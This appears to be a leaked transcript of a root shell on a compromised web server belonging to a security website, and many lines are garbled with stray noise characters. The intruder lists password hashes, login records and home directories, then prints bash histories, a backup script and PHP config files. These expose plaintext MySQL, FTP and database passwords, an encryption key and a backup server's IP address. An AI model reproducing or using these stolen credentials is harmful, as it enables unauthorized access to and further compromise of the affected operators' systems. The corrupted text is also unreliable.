# w: l7 I: s: B3 z+ V9 ]admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
! F* t) ^, `: T% |6 p6 w) P) \+ T- hjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::: u M4 c6 h& P* ]0 k) F
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
/ [# J5 `/ O& _# v+ [- ~ l, gastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
8 z5 I5 N, ]! F3 R9 X6 d, U1 c1 a3 o% c
0 W& a& s( W6 `* g1 bsh-3.2# cat /etc/motd% O2 N, W3 j4 ~9 D
#####################################################4 G; T1 [; e& U' r) [0 ?
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #' I/ t7 ]9 j$ p
# |__| [__ | |__| | |__| | | | [__ | |__| #
5 R& Z+ b( y9 \9 C2 h. R# | | ___] | | | |___ | | \/ | ___] | | | #5 W/ a/ A% Y/ h& ~
# #
- x9 D: ]) w0 t% T# G; ~/ R: M& h#####################################################/ C3 ~- \0 G" y6 t( `/ G! |
# #; R& o6 i6 I7 L2 e! Z( q" ~
# Admin Contact - 链接标记support@secureservertech.com #
& C/ s* p& h0 C M' H+ @$ v# #) x5 ~" q2 h! e
# Available ShortCuts #
: u% I# f1 H- `# #
1 t6 p0 M k* q8 b# nst - list active connections #
9 F: o6 L* b* l3 o6 s6 \7 o- w2 e# ddos - shows how many times each ip is connected #. |$ u8 O# y* O* l. @" C
# ltr - restart the webserver #/ D+ \3 K) h* ~' R% @
# phpc - edit the php config file # P. `' Y5 Y5 T
# htc - edit the webserver configuration file #
* O* ~' L% Z! S* A: m3 l- o8 R# up - uptime #
( b4 h& w+ `3 z) b2 x, J* k8 T# etd - edit the motd of the day file #5 ]. ?# W3 k1 d5 L
# htr - start and restart apache if needed #
4 \+ m' W( ]9 E- A" x# syng - shows active SYN_RECV connections #
! ^' I0 k8 d1 g4 M/ M. I+ m# synd - syn flood blocker - “synd -h” for usage #
& v) q# o3 ]# p7 y; s1 H: @6 s#####################################################
* Q* I Y/ T" N Q# NOTES: #
: r# h1 i: I% N7 O7 l# Last Upgrade - 12-08-2008 by JF #1 G8 Z4 m; L, X1 p& A
# My.cnf/Mysql Optimization - 1-28-09 #( R4 u* Z7 X# p( z3 k
# #; B7 b9 e& V# }6 c2 D
# #
$ [' i6 f$ q/ P' W" |6 L# #. c( d; r+ O1 g$ z, Y$ a$ }: f
#####################################################
# m) {3 D2 V* {5 k
+ Y5 B+ S( l7 B; P% Q) x+ N7 Msh-3.2# lastlog | grep -v Never) h. E' m3 r, G
Username Port From Latest/ P- g9 }) u% T& [1 d7 V
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009' b% G0 S9 j2 k# _! M; [; u/ M
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008! o0 H1 K8 Y$ v$ O a$ T
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009# \( \2 D+ u E$ d; U7 f" |. t9 i2 T
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
9 Z+ ]. m& s' E) O' k) B3 `. p) ^" c3 b- f! }" w
sh-3.2# ls -la J6 y: W5 s' J3 Q
total 453376
! K1 H% u, y, b+ e$ Udrwxr-x— 15 root root 4096 Jun 4 08:40 .
/ a% `# J/ B* y& s! J; Hdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..4 I! \: ]: M9 n8 i r1 s
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
# Y+ w" O7 U# C-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg( D% ?# {/ e' A9 p
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
6 X7 h" v+ f& Q9 E( d5 R: c-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
7 M/ q5 J9 f) W4 h/ }! y-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile9 j' p' |# B) I
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc" f d' @, ]+ m# r
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
) T# j! ?) P( ` T-rw-r–r– 1 root root 1327 Nov 29 2007 cert
" k9 X4 s/ x( Z' ^9 y-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
. w" Z5 L* q4 Q8 P* edrwxr-xr-x 4 root root 4096 May 20 2008 .cpan& v0 c2 o9 I& h' |- A1 a% }
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc0 h! X" c) ]. J; ]
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
# g9 q4 \* m& U! ~2 Z" e7 ]+ udrwx—— 2 root root 4096 Oct 28 2007 .elinks
% {$ N3 y/ B% Gdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
, I7 s1 V5 }9 a' [- z0 e. `' J( C-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2 Q2 K2 L- e; Y/ Q. T# K" r
-rw——- 1 root root 0 Apr 16 13:19 .history
& S- V2 Q, e2 {8 T% v8 L1 W6 R% K-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
# Y2 r4 t. G3 F5 ~2 |. r4 R-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog& a. c: d7 }4 J6 C) ~* B! Y
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
, ^ O" S* d0 E" i! E# z0 y! e% ~-rw——- 1 root root 35 Jun 2 14:23 .lesshst
Q8 e! R2 z% n0 V5 D4 ^drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp1 a' @, L9 t( t0 e$ Q7 l
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
$ a" X; j1 W1 L/ K, Z; f( B( E1 I$ I-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
0 Q% A1 I' U7 k+ x* n+ s8 n3 k-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
6 \$ d7 _5 o1 T' ?) [; W-rwx—— 1 root root 760 Sep 18 2008 lp# P) S$ Z9 _- Z* R
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1* e( K& W$ Y2 `& `! p# H
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz ~. t N a0 W9 K: b# T1 M
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.16 O* K: }: z4 K; Z! r9 C
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
2 P- Y8 M! q! ^: @5 _: L-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz0 u1 A. k6 P' B
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3, }/ ?6 u5 L1 N2 O$ c
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz+ i' M. Z( q5 p/ A: p
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh8 E' c) `5 t+ R7 M: L4 @
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
8 `3 l# p7 f2 a: P-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history
( F# d" U' F$ B# U) W: p-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport
- H0 T' ?& b2 ^; I-rw——- 1 root root 41 May 20 2008 .mytop- T# E G2 \* g
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
* j& D. `( C( F-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
0 D2 T! T. v& T- T, ^drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp# l& J" ?$ _( ?- `
-rw——- 1 root root 1462 Sep 21 2007 opt.php
0 x! W/ g8 i3 E# R2 Q-rw-r–r– 1 root root 3371 Sep 22 2007 p
! I- C, p7 l+ A5 e/ n-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2 I% k) P2 c+ u% N5 V& z) P
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
1 A) t* _; \! I4 z! S# Z+ K! @-rw-r–r– 1 root root 716 Nov 28 2007 server.csr+ F! |9 F+ `" t( ~
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
- Q, V7 }0 O$ Kdrwx—— 2 root root 4096 Oct 10 2008 .ssh
2 F! d! @0 X1 Q- x/ b' D( i) u-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat c/ n$ z0 G( o! i: k! B! S
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc( V$ e% M; J% D/ w
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
" M; X+ u& m# ~" b& g( n/ n, e-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.12 y" v8 x" T$ {: i- C5 S
drwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp/ D0 G2 M& p0 s! G
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh6 z( a, O1 `5 P
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0+ u% V/ V; g; ~1 A# v$ @ F c1 h9 j
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2' \* H9 E1 f; Y+ {! Z8 V+ U
-rw——- 1 root root 12997 May 16 2008 .viminfo
) \% }- L$ `# K! l( T! T1 ^
- u8 e) n/ X: Y; Xsh-3.2# cat .bash_history
! m4 q5 G0 q; b- Z[snip]
0 @! ^, `; L! V9 U4 ~) W- ~wget cp4sst.com/sstlinux.tar.gz
5 R$ N. z' t" ~0 F2 k' N5 o; ftar zxvf sstlinux.tar.gz
" ^, \/ P/ U" I* U* Pcd linux-2.6.27.10% R$ i% z' r3 ]/ d
sh install.sh
A6 O, h; J" u+ W6 n% Lmake bzImage ; make modules ; make modules_install ; make install) X: |7 J Y. f1 a, s
make clean: y! J0 O+ D+ T' [* o" S. p
service mysqld restart9 Z; k; E2 W" E+ p4 W- Z
[snip]
6 N" Q! |- ~$ B# r* F _cd /usr/sbin/" S% Z4 U5 |5 n/ f0 d
chmod 4777 traceroute0 n& `5 O' E# `8 h5 w- z4 F5 g* ^
chmod 4777 ping! r3 Z; Q% F5 M$ r0 z
traceroute -I 链接标记[url]www.astalavista.ch[/url]
& I0 n1 V/ D$ h[snip]
9 P- S' C* _ w: I. J5 W, r- ~vi /etc/csf/csf.conf
}5 f& T' E7 h0 i+ T" itraceroute google.ch
, H2 T. y4 F: i5 x! Zservice csf restart; ^ F* Z+ Y0 d# `: V, H9 X
tracert google.ch
0 h" Y8 T# D9 c W0 }% _* Cservice csf restart% y; l4 v+ z7 g$ d' z
traceroute 链接标记[url]www.google.ch[/url]
# @) G6 `* T& H0 ntracert 链接标记[url]www.google.ch[/url]
. d* i2 b }+ L/ Otraceroute 链接标记[url]www.google.ch[/url]
' b l/ G) b* f/ b8 vlocate traceroute7 d1 \7 i! I8 t7 ~
chown 4755 /bin/traceroute1 N- ]5 O+ I2 f+ F, P
chown 4777 /bin/traceroute( t& R+ [8 `, M# k+ H* ]
locate ping
! R8 k0 |: E1 G5 vchown 4755 /bin/ping
0 M- |4 R% O& r3 }+ b2 a6 T; f1 Jchown 4777 /bin/ping
. k b' W% O2 G1 w# Q# Hcd /bin/
& @ @- {; `9 S/ `4 g6 rls -ali | grep ping3 i& y3 j0 `/ o; P+ _9 J
chown root ping
6 {! X, F8 ]) s5 B3 N, ~3 bchmod 4755 ping4 ]$ @. b$ ~# O8 H
ls -ali | grep traceroute- m; V+ d1 e& d) P
chown root traceroute$ e! r9 b3 q( Q6 o; b+ L
chmod 4755 traceroute3 B" ]5 ~2 W" n
ls -ali | grep traceroute! L2 R9 k6 i* @: A1 d2 |. U
traceroute -I 链接标记[url]www.google.ch[/url]
2 v) A$ K; g% |6 C# n; ptraceroute 链接标记[url]www.google.ch[/url]
4 d. J, \- D6 R' X3 R1 S( j" Cwhois pmsantos.ch$ B$ h2 }9 r/ l0 {- Y* v
[snip]+ u4 J3 j' M6 u5 v' w. \/ _7 H
mysql -h com_contrexx2_live < /root/defaultp_ports.sql' l1 B- m5 H" I/ m9 Q
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
, T' {3 x' v) i1 o gmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
* y0 p6 j% {5 b% g+ q1 `, Wmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql- U# e2 E, J# L1 D
top
( x0 b R% x1 h2 ^' Rping ssth.ch
" ?4 V' u' [1 c P3 w/ vping asdlkfaljgasd???ljg???lasj.ch1 |0 S' Z3 `. s# O) M7 J5 ]
ping asdlkfaljgasdlasj.ch
: f& D, R# X( p! wping 链接标记[url]www.ssth.ch[/url]$ ?: |& `: V0 K0 s1 D
ping ssth.ch0 d2 ]9 H- ? w
nslookup 链接标记[url]www.google.ch[/url]
" _1 A) j) \/ f1 y+ {5 G+ Dnslookup 链接标记[url]www.ssth.ch[/url]% q' Z E% S" M* D7 O! f
man nslookup8 l0 \* m% D6 s0 L
ping 链接标记[url]www.google.ch[/url]
. u# i1 `+ [+ N" ]nslookup 链接标记[url]www.google.ch[/url]' S% x7 t' D1 q; N
nslookup 链接标记[url]www.google.ch[/url]9 t( }9 i8 S/ R# q
nslookup salfjasdlf.ch
* k9 l: a0 q! \- E8 O _[snip]& q3 B7 u# e" s4 s: K9 A
openssl passwd -1 sadf% s! r" G' e: t4 F1 T' X+ ~" f" K
openssl passwd -1 5cZNHstdTy
9 I% b" `& w/ |/ ~mysql: x7 P9 D% U$ ^( Z( @4 i
mysql- |! x- b; ?, ]/ Y
locate proftp5 l" `$ ?3 `' y: i2 X
vi /etc/proftpd.passwd2 p: d" _) N- M
service proftpd restart
5 n6 ?& y! _- K- K q2 q1 R0 |locate proftpd.conf
5 r' W# j7 i( L pvi /etc/proftpd.conf7 ^( p( c/ ], ] q9 [
vi /etc/proftpd.passwd
5 |+ W; ]3 P0 e; `7 C# S& a7 fservice proftpd restart& E- V7 K% }. S/ _4 @& O
[snip]
2 C/ {* ^8 i4 B2 c' S/bin/sh /home/com/backup_system/backup.sh$ s$ H0 p6 O( W1 D
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
5 e% g0 j! n Xmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
3 X# H3 ^" T( e0 a* pmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
8 R# K* V* a. v5 ~7 Yls -ali
2 D9 W( f, E2 W7 b) Umysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql# X: J4 ~- s h
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql1 M- q- g) Q4 d& u2 w
crontab -l4 C, Z, t; a- L3 J2 [2 j
crontab -l+ V2 V1 A( C [7 ]7 d. y' s
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
# ], u# \/ m& q( r- ^; O/home/com/public_html/modifications/cronjobs/exploits.sh
7 m8 P9 Q: f C" ?) Z2 K2 y; zwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
; L3 t/ ~. K$ }3 {# Ftar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz; `5 U5 d" @8 ?& P- i2 b
cd lsws-4.0.31 K6 T& u+ z% I( w' e {" j9 z# E
sh install.sh/ H1 G* X# a* _# f
uptime. B p8 a7 k/ D) d2 u l1 e
hdparm -tt /dev/sda, w" w! h8 k4 K. D1 i+ V0 t
iostat
9 ^) Q4 L. Z2 {8 a# `$ W/ T% ~* ayum install iostat
p b9 t+ x; T6 [5 T9 n: fiostat& M/ k5 d: X0 S# w6 W7 h
whereis iostat
+ e9 Y y& K8 q2 s9 [* zyjm clean all. }, x* I2 f# t! K; a; p# V; f
yum clean all ; yum -y update7 `% o& p4 D2 a% H+ c% p0 O
iostat1 b; o( }( e# a" n
yum install systat
) z- R1 o& p$ ^( X* d$ urpm -qa | grep iostat; K' Z! v* m3 M; x+ c" S
rpm -qa | grep sysstat/ I1 ?8 G5 o( l! _( f" x& \8 s
rpm -qa | grep systat
9 }, s, d" k) q- Y, f$ e% l) q' |dmesg -c7 B7 W5 H# X$ e) a2 E; u# Z. R* \2 h
sysctl -p$ z3 V0 C/ ^' V2 p0 t3 O" O3 M
uname -r7 |- D: b: |6 [3 k R, J# O& I
cd /usr/src
: F- \/ @" g* r0 o$ D% d8 kwget nix101.com/kernels/sstlinux.tar.gz, E( m4 A- u5 M! Q3 q
shutdown -r now0 Y }- C! p o% j1 F2 T* U, K4 E
nano -w /boot/grub/grub.conf
x3 I9 E3 F# h+ {; G9 c
) x- i! C7 r2 | D& c1 N% [* @sh-3.2# cat .my.cnf9 f9 [; S% c( {0 P1 p: N* Q5 }9 d
[client]
! N7 F: z* \0 _. D0 Vuser=da_admin
0 g5 B: D* {/ n6 S/ N5 d7 Dpassword=X9dctmRH
4 \6 ]/ ~% a" J' c- d4 S
% e1 b5 H9 K+ B2 O1 Y) ~5 r2 J7 h' |sh-3.2# cat /home/com/backup_system/backup.sh) z" I" `$ y) E& d7 \* \ p
#!/bin/sh& m' B1 L2 J2 W3 O6 x: r
#####################################################################, @- J( _1 N1 N% }% J$ X
# #+ {- q f v9 H% j$ c5 B1 ~
# incremental backup for astalavista.com #
- J8 h0 h1 i8 o9 y% _# #
3 C, d9 [7 \ H# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> ## ?* P5 b! [7 r& G$ j% V& `
# #
+ I, Q6 ?* T. ]#####################################################################$ b# H$ G; F8 C9 x8 @
[snip]
6 N' ]- [- d+ H- I3 M& G5 ~PROG_DIR=”/home/com/backup_system”;2 e0 \. u) [) N% `. R
BACKUP_DIR=”/home/com/backups”;
}1 [) ?$ [& n: I0 D# ^+ C3 yDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
" L9 b1 j9 H$ a* |# ftp for synology backup server4 [' g3 V' m6 [! Y
FTP_HOST=”212.254.194.163″;9 d0 D# ^* O) T5 \
FTP_PORT=”21″;
2 E! A) h; K- S4 U5 u" D" ?FTP_USER=”astalavista.com”;
% c" M7 ]9 T: }4 V& LFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
0 i* ^4 g4 ]$ ?/ o% ?FTP_DIR=”/astalavista.com”;
! V x p. y& N- X' B" U# database
2 o# g, }5 g4 hDB_HOST=”localhost”;2 z( ?, T: C4 d' I
DB_USER=”contrexxuser2″;
* Y w! [$ r: U) Z# A8 GDB_PASS=”0fEYNZgXz1pKe”;7 D" A1 ?. {% n, B( G
DB_DATABASE1=”com_contrexx2_live”;$ A0 R6 X: S& X* M8 J8 D
DB_DATABASE2=”com_contrexx2″;
2 D+ h% u b& {# |+ ][snip]
: I( O, A9 Z+ X3 pftp -in $FTP_HOST $FTP_PORT <<EOF
?/ @& v6 k9 y, P3 L0 hquote USER $FTP_USER
$ C8 `/ r* @$ k0 t) u* \7 x9 ^1 ]quote PASS $FTP_PASS) t$ y$ j1 m1 t% e$ P, o
cd $FTP_DIR, n5 z& U3 I* e4 M7 f) n) T
put $DB_FULLNAME-SQL_Dump.tar
# J+ _( v, a4 h8 b: Q+ M" g( N' aput $BACKUP_FULLNAME-Public_HTML.tar
( C |9 W. h: N1 n! \close
1 R) O( M5 H% ?3 L. K" I2 F% V6 Abye: B4 z! ]0 L _
EOF1 w1 q5 `0 D9 y$ U( P1 t2 @
" U. @1 m$ U6 n6 b; N
sh-3.2# cd /home
4 ]- [& D/ T# |$ jsh-3.2# ls -la
+ _% D( l7 N) S5 E. Z8 D( [total 120
, K- ]. [# J, M x+ S& J, O: Hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .
/ o I' i; C) w+ I) Z+ v9 gdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
% V# u9 g* C0 B Y0 s+ z/ f% Rdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
2 T% G3 ?8 @9 Q-rw——- 1 root root 8192 Jun 4 03:03 aquota.group0 Z2 d6 e, F/ S7 z$ H7 j
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user" L+ c1 |) f2 x
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
0 D, w. M" D- e& e0 I. x Hdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
% J1 X( z8 Y( J! {# q) ddrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161; p9 P6 ^8 ?+ V. e4 u' C2 v
drwx–x–x 10 com com 4096 Apr 28 12:40 com% d/ D' U; f' C/ a, K
drwxr-xr-x 2 root root 4096 May 17 2007 ftp6 f& [- B& n) x6 B* J9 g
drwx—— 3 jon jon 4096 Sep 21 2007 jon. ]9 s: u/ `- y, k# D5 _3 a
drwx—— 2 root root 16384 Sep 11 2007 lost+found' g( B, C& q7 I' p: C
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
+ Z4 J! _8 U' W3 e0 @! x3 ydrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
1 P# C k" a6 e! d0 t, D2 ]drwx—— 2 jon jon 4096 Sep 15 2007 test }1 _% q, e7 x. i
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp* A+ q( l0 [( D7 M
8 _( }$ @9 e0 p
sh-3.2# cd admin
( |* P, ?: n3 h! A T; A9 [6 bsh-3.2# ls -la
8 W. G# Y0 d9 a% n! qtotal 1735896
8 d9 x% E8 r8 C, R& ~; M" Sdrwx–x–x 9 admin admin 4096 Nov 28 2007 .6 d1 L, I# P+ T: X6 O
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
4 k: T$ u$ N% d n; _5 M- Rdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
J# g' T; H: b' V+ q* e9 s; Udrwx—— 2 admin admin 4096 Sep 28 2007 backups) ~ v" n/ w, v; [: D
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history0 ?1 L ?9 D, I# V; R
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
: f: O; q+ q2 ]$ u n4 A. V" V-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile& F; r" b) X9 s( k8 }: _& g9 ^0 r
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
' a& ]' G/ _4 x5 l) c2 hdrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
" b% S& w+ h% F( ?1 V8 ?% hdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
! G9 ?6 A5 }0 U D/ f4 L' Ndrwxrwx— 3 admin mail 4096 Sep 21 2007 imap ?% e+ V8 c, Y
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
) S. l( j* t. g; X/ |% Pdrwx—— 2 admin admin 4096 Sep 21 2007 mail
! V T4 H8 ]' `7 C9 z/ l-rw-r–r– 1 root root 716 Nov 28 2007 server.csr. \" Q n, m. J
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
9 q2 E+ n7 e. A2 Z% R& C-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow, @% K/ _8 @ m. f
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
& v) o( r' C' K& Y$ S" Qdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups5 ~" Y* d# H4 C- R4 _
[' w% b( {/ d' q' G/ p9 J# e
sh-3.2# .., r) a: o% F+ X' h E' M7 p
sh-3.2# cd jon* U; m9 i: |2 x* l8 q
sh-3.2# ls -la
' D& R1 v3 `- o/ {% |total 36# N) @2 P* i) k% L7 [, Y
drwx—— 3 jon jon 4096 Sep 21 2007 .
W. J5 n2 J" q4 Z) s& udrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..2 O7 I- m+ L8 `6 c+ C
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
& [0 y1 a2 p! h+ b-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
0 k3 r8 N9 G3 i' J9 e-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
. U5 U7 \3 m% r# T0 y% @-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc& D0 D! O5 f' d4 p" A( t
-rw-r–r– 1 root root 24 Sep 21 2007 info.php' N( B& K) ?! Z% U8 b
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html( \) b p- P! {: p& l
& _: o$ l2 J! U8 ^& L/ K8 v- Z4 R+ dsh-3.2# cd ..
0 e2 B! l6 Y" f2 i( z+ T q rsh-3.2# cd test. s ?: S# o% `6 C2 \. k; h
sh-3.2# ls -la8 c8 r3 V: s# }# b
total 48: j3 r$ E, m5 m, P
drwx—— 2 jon jon 4096 Sep 15 2007 .
0 ]$ k$ C+ c& T: {; i. R5 w$ sdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
5 y/ F2 m, p; Z: x/ U-rw——- 1 jon jon 79 Sep 21 2007 .bash_history2 u+ O( E& I9 N0 Y! D) N* ~
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
A8 H7 W3 C$ i0 X3 R6 I-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
0 _" X: z+ n7 z6 t& ~* ]* [9 o7 y-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc# u s/ c* c0 Z+ G3 ^0 ~* V$ l: V
sh-3.2# cat .bash_history3 [% O) m8 X3 V5 F, | L' ~& e' W
/usr/bin/mysqladmin -u root password PoliuJhytg67- t6 u" \) P% e
0 d8 I( ~9 o8 H! l% rsh-3.2# cd ..
, I+ @8 F+ f2 F& x4 @8 Ksh-3.2# cd astanet) S; }$ M* Z% P3 I# ?7 e
sh-3.2# ls -la
! J) t1 [ @9 d/ l, p, f+ ntotal 52. E( }1 w3 m' J, [ U; c/ V
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .; a7 |) G4 E3 Q% G, S4 t/ ]: t
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
! g, D% H& F& X' c2 B- L8 Rdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth/ R" z/ Z: _1 u( [' J
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history" u+ D9 \4 I/ R: W M
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout, D1 `: I6 {8 K% |$ V7 g2 }: T
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile$ ]7 v: T4 J0 N2 d* B
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
: r" E3 p+ S% B% D5 ~6 U2 G( r: idrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains5 v5 G) u% g, p* H k% D
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap9 @& d) @; I# Z6 o: c
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
# p6 k' I% s3 n, Z+ t( W-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
. X) U/ h O( S# Mlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html6 `: i) a y- Z0 Q* O' ]; X; ?- T; m
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow# P/ `' c/ ]: T. ?% R
2 B" c) c0 Y& |. k: l
sh-3.2# cd auth/
k5 e+ j! X$ C7 j0 ish-3.2# ls -la8 w7 t' c3 ^: ?! B
total 28
9 H$ H4 q; b0 ]3 t0 d1 Bdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
j6 P r* G" a2 ]- }9 K4 }drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
& I- `/ I! u) }; x-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
f6 d# X, {3 \% f. z1 `-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
% Q: {9 P( V, C \1 O- N-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd: ?) p3 W# |. s. b# i; }% X' J& J
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting. d& V6 F0 t7 p
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
: J8 l/ ?9 ]" G) {" h4 e2 f, X' f
: h& t! N$ o0 J+ r1 F ^$ j& ysh-3.2# cat hackercontest.config.inc.php
7 V) @7 O# s4 m0 r, i Z" Y<?PHP; P$ j5 G; S1 D1 J) r* E& F
// Variabeln f?r Verbindung zur Datenbank //- W4 S2 u( d% u) D# j/ b" ]
$conxHost = ‘localhost’; // MySQL hostname
" V& n: v1 D( m* x6 J9 K$conxUser = ‘hackercontest’; // MySQL user
+ o5 e$ H$ ?" e; Q o+ [4 I$conxPassword = ‘K6m@7dUc’; // MySQL password1 s( Q/ \2 ]3 t' Z4 ?& x
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish0 I- B5 M5 n6 F6 F
?>. j7 P! R6 z( T
sh-3.2# cat hosting.config.inc.php7 h5 b5 H* D9 U: Z6 V8 J; O) S+ y2 W' s
<?PHP) E8 R( f0 y' w# n
// Variabeln f?r Verbindung zur Datenbank //
0 D& G# W9 i! G! l" l) I$conxHost = ‘localhost’; // MySQL hostname) L' t7 i6 l$ p- |! Y
